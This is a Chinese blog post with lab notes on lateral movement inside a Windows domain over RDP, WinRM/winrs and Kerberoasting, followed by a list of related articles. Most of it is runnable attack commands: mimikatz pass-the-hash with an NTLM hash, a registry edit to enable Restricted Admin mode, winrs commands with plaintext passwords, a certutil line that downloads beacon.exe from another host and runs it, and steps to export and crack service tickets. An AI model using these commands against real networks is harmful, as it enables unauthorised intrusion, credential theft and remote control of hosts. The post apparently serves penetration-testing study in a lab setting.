内网渗透之横向移动rdp&winrm&winrs&spn&kerberos

最新推荐文章于 2023-07-24 10:13:12 发布
最新推荐文章于 2023-07-24 10:13:12 发布
阅读量766 收藏
点赞数 1
分类专栏: 内网渗透 文章标签: windows java 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130340310
版权

0x00 准备

环境:god.org
cs上线 win2008web
提权利用ms14-058
抓取hash和明文密码(当获取到其他主机就重复提权和抓取密码)
扫描存活主机,扫描端口
代理转发-转发上线,生成反向连接木马,绑定监听器,上传至web根目录(方便其他主机下载执行后门)
开启socks代理
配置全局代理工具(注意代理服务器是cs服务端ip,而不是cs上线主机ip)

0x01横向移动rdp

rdp可以明文也可以hash连接
不出网机器连接rdp方式:

  • 直接进行vnc桌面交互再去利用mstsc连接其他主机
  • 开启socks代理,mstsc连接
  • 端口转发,建立隧道,将端口转发出来

1.探测服务是否开启
在cs中主要执行的命令前面要加shell
命令:

tasklist /svc | find "TermService"   # 找到对应服务进程的PID
netstat -ano | find "PID值"            # 找到进程对应的端口号

注册表查询:

REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

端口探测:
cs内置端口扫描3389
2.crackmapexec
可以使用此工具探测hash和密码与用户民匹配是否正确

3.利用:
(1)明文连接

cmd
mstsc /console /v:192.168.3.32 /admin

或使用直接使用mstsc图形化工具连接
在这里插入图片描述(2)使用mimikatz进行hash连接:
使用mimikatz会在windows中弹出一个窗口,输入ip,会默认使用这个hash
进行登录

利用条件:
需要计算机开启Restricted Admin Mode,都需要开启即进行横向移动的主机(要攻击的主机)和受控主机(cs上线)
win8和win2012 默认开启
如何开启

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
新建DWORD键值DisableRestrictedAdmin,值为0,代表开启;值为1,代表关闭
对应命令行开启的命令如下:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

hash连接

本地用户
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"
域用户
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:god/administrator /domain:god /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

注意有些计算机可能不支持restrictedadmin,弹出以下窗口
在这里插入图片描述

成功:
在这里插入图片描述

0x02 横向移动winrm&winrs

winrm代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。winrs是一种客户端
利用条件:
双方都启用winrm rs的服务,不支持hash
使用此服务需要管理员级别凭据

Windows 2008 以上版本默认自动状态,Windows Vista/win7上必须手动启动;
Windows 2012之后的版本默认允许远程任意主机来管理。

如何开启

winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探测服务开启状态
powershell探测

powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

端口扫描
cs内置端口扫描5985

2.利用:
(1)winrs命令

执行命令
域用户
winrs -r:192.168.3.32 -u:god\administrator -p:admin!@#45 whoami
本地用户:
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami
上线cs
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe && beacon.exe"

在这里插入图片描述
(2)cs内置插件
winrm
视图-目录列表-选中要进行攻击的主机-横向移动-选中winrm-填入用户名和密码-选择监听器-选则会话-运行
成功:
在这里插入图片描述

0x03 横向移动 spn&kerberos

环境:
0day.org
主要利用的就是破解票据里的密码,当pth,ptt用不了时,可以考虑kerberos攻击
Kerberos利用条件:
采用rc4加密类型票据
工具
Rubeus 检测票据加密方式
kerberoast-master 破解票据
spn是一种探测域中有些服务的协议
在这里插入图片描述

1.检测可以用的服务
命令检测,或者不加powershell

powershell setspn -T 0day.org -q */*
powershell setspn -T 0day.org -q */* | findstr "MSSQL"

工具检测直接找出可利用的服务

Rubeus kerberoast

在这里插入图片描述
2.利用:

清空票据
kilst purge
请求:(要产生票据文件),选一个服务,查看是否是rc4加密
powershell Add-Type -AssemblyName System.IdentityModel
powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"
或mimakatz请求
mimikatz kerberos::ask /target:MSSQLSvc/Srv-DB-0day.0day.org:1433
导出:
mimikatz kerberos::list /export
破解:
python  tgsrepcrack.py pass.txt "1-40a00000-Administrator@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi"

在这里插入图片描述

参考文章:
resticted admin mode

mushangqiujin
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows内置工具横向移动
weixin_43873557的博客
02-10 486
01. IPC+Schtasks IPC$ (Internet Process Connection) 是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 利用条件 开放了139、445端口; 目标开启IPC$文件共享服务 需要目标机器的管理员账号和密码 连接 net use \10.10.10.201\ipc$ /user:administrator “1qaz@
内网渗透测试:利用 WinRM 进行横向渗透
yyyyyybw的博客
09-28 346
WinRM 作为 Windows 操作系统的一部分,是一项允许管理员在系统上远程执行管理任务的服务。这样的服务当然不会被攻击者错过,本篇文章我们就来讲讲 WinRM横向渗透中的使用。WinRMWindows Remote Managementd(Windows 远程管理)的简称,是 Web 服务管理标准 WebService- Management 协议的 Microsoft 实现。该协议是基于简单对象访问协议(SOAP)的、防火墙友好的标准协议,允许来自不同供应商的硬件和操作系统能够互操作。
CS和MSF联动实现内网横向移动
wuxinweii的博客
10-21 1446
CS和MSF联动实现内网横向移动 ** 实验要求:外网vps一台 cs服务器 msf工具 已经成功拿到shell** 一、使用cs生成EXE文件上传到目标主机直接上线 *1.先使用cs生成一个监听器来监听EXE连接回来的端口 主要配置payload类型和监听主机IP和端口 2.生成一个exe可执行文件 主要配置监听器和类型类型 3.将文件上传到目标直接执行 4.上线成功 二、扫描内网中的其他主机 1.使用cs的portcan模块来进行内网其他机器扫描 2.扫描完成后发现内网有很多主机,而这次的目标
内网安全:横向传递攻击( RDP || Cobalt Strike )
网络安全领域___专研者.
06-11 2316
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
WinRM横向移动
Ping_Pig的博客
10-22 833
https://blog.csdn.net/SheXinK/article/details/103754294
红队内网攻防渗透:内网渗透内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
最新发布
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗中的横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件和UI插件等技术手段。 首先,横向移动内网渗透的关键...
Xshell&Xftp;
02-13
1. **多协议支持**:除了SSH,Xshell还支持 Telnet、RDP、Serial等,满足不同环境下的远程访问需求。 2. **多窗口管理**:可以同时打开多个终端窗口,每个窗口对应一个不同的远程服务器,便于多任务并行处理。 3. **...
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
内网渗透测试安全学习ppt
02-12
6. **横向移动**:一旦获得一个系统的访问权,渗透测试者会尝试在内网横向移动,寻找更多权限,如通过SSH、RDP等协议跳转到其他系统,或者利用内部共享的凭据。 7. **权限提升**:在内网环境中,权限提升是关键...
域渗透完全技巧.pdf
10-03
内网横向】是指在获得初步权限后,在内网中进一步扩散影响力,【权限维持】则是指在成功入侵后保持长期的控制能力。 1. **无凭证情况下的网络扫描和漏洞探测**:在没有用户名和密码的情况下,攻击者会利用网络...
windows配置kerberos认证
01-09
最近在研究hive数据库,但是Windows环境下hive数据库登录需要kerberos的认证,被kerberos的认真折磨了好几天,差不多把百度翻了个底朝天没找到实际价值,后来终于解决了。总结了一份文档
横向传递之WimRM
01-12 1444
简介 Windows 远程管理 (WinRM) 是 WS-Management协议(很多文章写做WSMAN)的 Microsoft 实现。该协议是基于简单对象访问协议 (SOAP) 的、防火墙友好的标准协议,使来自不同供应商的硬件和操作系统能够互操作。 此WS-Management协议规范为系统提供了一种跨 IT 基础结构访问和交换管理信息的常用方法。 WinRM 和智能平台管理 接口 (IPMI) ,以及事件收集器是 Windows 硬件管理功能的组件。 WinRM早期版本监听的是80和443端口,win
内网横移方法与实验】
一纸荒芜的博客
08-05 2267
内网横移技术
内网横向移动思路和技巧
热门推荐
11-30 2万+
攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网横向移动。最简单的方式,就是使用明文密码进行登录远程服务器。在这里,我...
内网横向移动Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
剁椒鱼头没剁椒的博客
07-24 983
文章中很多的环境,由于都是自己搭建的,有时候可能会出现无法测试成功的情况,有人问为什么不使用别人搭建好的靶场,主要是懒,不过最关键的是,这些环境太大了,自己的小破机器带不动呀。同时后面的文章很多之前介绍过的操作方式,我就会直接说,而不会像之前一样,一步一步操作,就比如我要设置socks代理,我就只会说,这里需要设置socks代理,而不会在去一步步演示socks代理如何设置。
Windows Server Core管理之WinRM
weixin_34216196的博客
04-07 153
  最近,为了实验我们安装了台Windows Server Core的服务器,没有图形界面的系统总会给人一种很完全的感觉,我们本着安全到底的想法,使用了Windows Remote Shell 的管理方式,因为WinRM基于Web服务管理(WS-Management)标准,使用HTTP协议80端口(HTTPS port 443)。这样一来,我们就可以在设置一个严格的防火墙...
内网安全】横向移动&Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
今天是几号的博客
03-29 1013
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。•服务票据的暴力破解(使用密码字典进行RC4协议破解)cs 内置端口扫描3389。
The Attempt To Connect To Powershell Using Kerberos Authentication Failed The WinRM Client Received
zz_strive_2012的专栏
03-20 677
After upgrading a Server 2008 server recently that was running Exchange 2010 I came across this error.The Attempt To Connect To Powershell Using Kerberos Authentication Failed The WinRM Client Receive...
windows外部工具横向移动
weixin_43873557的博客
02-10 458
01. Psexec PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 下载地址:https://docs.microsoft.com/zhcn/sysinternals/downloads/psexec 原理: 建立IPC连接,使用Psexec无需输入密码 第一次运行会弹框, 加 -accepteula 参数可绕过 -c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除) -d 不
内网渗透流程与思路和工具讲解
04-10
内网渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部网络的安全状况,以发现潜在漏洞。以下是关于内网渗透的核心知识点: 1. **内网渗透流程**: - **阶段一:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值